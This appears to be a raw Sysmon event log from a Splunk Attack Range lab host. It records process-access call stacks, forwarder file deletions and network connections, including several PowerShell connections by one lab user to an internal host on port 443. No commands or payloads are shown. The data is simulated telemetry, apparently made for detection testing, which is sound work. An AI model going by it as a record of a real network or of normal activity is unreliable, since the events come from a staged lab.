18:07:32.839{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:07:32.839{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035083868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:57.138{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56529-false10.0.1.12-8000- 23542300x800000000000000035083867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:32.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04786D9F799A3D4B3F226F1190EE4242,SHA256=ABC420682DF8F81D14F79C6185034D1650DB7F3BE575075FB35D949A4BBA9849,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:33.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F26AF8EBC6EC126DBD3C3FE96081EA6,SHA256=9C2465CB86D897207B2FE14E51424EDB15F5D33D8625C3B1ED3E9AD8C67205B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:34.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4517D521B812FB6780228A4F419A942,SHA256=53D13AA1A1D394F499EF028CB452073932D2823FADA75E2B6BEC17D83EEDA07A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:00.438{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56530-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:35.436{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=93265C843E53415486967CD3E8913810,SHA256=7DDBE4259D6E26F7BC3A70BCAF420055E436EF49406CF4819D2BC9D61D8309CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:35.252{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2824CB59307E5C5E39325E4AA79F741C,SHA256=D0381A1E3F8574980C64DF19CD0D8C0E8363766FBE91B57A98EA461C643146E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:36.383{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5196218587CC96E3BC5180EA232C6C8C,SHA256=566EE483F29FF3F51E0BD5629B8AEA70E8DD13E1561FAFA6870054277F059415,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:36.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F4F8574D8AFCAF60EB7EF3F70C86696,SHA256=3E02A6CB4FA8F9C67661FE19F01FEC62EB8215928A0D0789508A19923B4CFDBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:37.384{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=465A7592170DA8BE68C1E6743FCBCB5D,SHA256=9D187375206CBED3887DFB5A5FDD825FFDD90156230C2E6454AC8B32DF8DEF92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035083881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:02.233{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56531-false10.0.1.12-8000- 23542300x800000000000000035083880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:38.402{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D2B458EBA77AE43B24F7DC40B2690C,SHA256=AE545C4F5932D35C251028C96A13BB49996CEC6F2CBD1B5603AB56EED3BE7580,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:39.417{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D4B32402F14DF9BC84B26667B93492,SHA256=11390C0DF20F2ECCA6022747F1060134C0EDA546ED0CF7A1F346A51749780EB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:05.447{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56532-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:40.447{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=442B55FD99564A5E51476ED05F4FA106,SHA256=EDC031C73B7CA662B24F6523AC8A0A48BD247CA23A60D862D0C6D623FE0F90EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:40.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C817F24D9E87E98B7811D8DA50BB856C,SHA256=F1BBB358906399400C1E08A1815FB70AE25E981D9C14B95FBFFE5885BD518942,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:41.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E542C92BBE0D46644BA0D406D60419EC,SHA256=6473585294BCA0E0EF6D2B9CD2280A848A6A0EEB80E778032BEE9ABA9B5850E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:42.478{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56541-false10.0.1.12-8000- 23542300x800000000000000035083949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:01.900{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BCA925167C6AD3B61A1E536B3606606,SHA256=3D9CF9034D42E08208FC54AB0DDD353CBCF4D4CF3664878536A1EB9B8E93CAAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:02.915{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F589CDAAD29C99D232B04518798FD56,SHA256=216848C58848B279C41CFB927FF41CC42E7E3F509F188D81A4E9C5F5391918CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:03.930{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E64007DCE2EF03FE825F7EB9939BBB1,SHA256=F45E10B62B809BB2008C23BCFC47145E6DA1051D071790A23E9A197740B1DEB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:03.565{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFAFB9AF3A3091D6979CD2F3BB0C6BF0,SHA256=D49E3672B6BD8A885B0A526C21C1135FD20BDBADDE3F87248137D8196E47126D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:04.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AD1707F5865F5F940C751D1E05A33B,SHA256=F0D9C838C4EC6E04CCDFAF654C1B02334D675F5BB892375AC055CDEC48420D1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.514{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56542-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:05.946{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977592E44EBB6FC0FB15F6F5E3B666F8,SHA256=7ECD40504CC369632CCA677DF4C83ADE971B899563894C5EE1450D5DE129D447,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035083955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:30.144{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56543-false10.0.1.12-8000- 23542300x800000000000000035083957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:06.964{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EFD57BFD02F046FB68CCD6762E6DA48,SHA256=4FABA99B0EDCE99A53558A29AC4C1BC4C2332D29478DEBB119A9CB6025DDB1EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:07.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038A3A5151795059B1D6ABCA1750B78C,SHA256=100389203BD8D56397A2DBE5020AF44C06254B58103EDEDAC0227B30286342F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:08.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=682C600E50C67F992C98598801CC64BC,SHA256=64FE7D4C30525B1B672E77A4AC76E30E1354DFE80148512F5FBD00BF40B58DE9,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035083960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:09.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=89B72BDED3FABED6CC9DCE9857048AAF,SHA256=901E35845135389A5D32C8A77B1880F82BF2F5CFCDC1208AF41504D7A536C94F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:34.527{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56544-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:10.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=585E7FB3CD022DA71E7B585A7D3D633A,SHA256=8CC0BE32CB0C0AC185B44EECD5BAF35BB5C8B11FA48496DA95497E208B1450FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:36.156{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56545-false10.0.1.12-8000- 23542300x800000000000000035083963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:11.025{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4682D13F2AC9239108C4FB1B86B0E448,SHA256=4AC60C61E63D0A5E1E5CDB51F75DF2EDE18C0D23D82AB56AC89300710DAC6926,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:12.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3188E44D952B5FBA0B573BC3242EF418,SHA256=5B86DF072BD8C74189744D4698805F86FB5D21C3D8A9207569B8FDE12646C7E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=689A8C8C1D34C0979329704F34D0D1F8,SHA256=3E146E90BB3A7AE435756D904CE219E2BFB7A70EF9615254B19CCB5C9C9C14A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.561{B81B27B7-4D8D-613A-2790-03000000C801}55964264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program 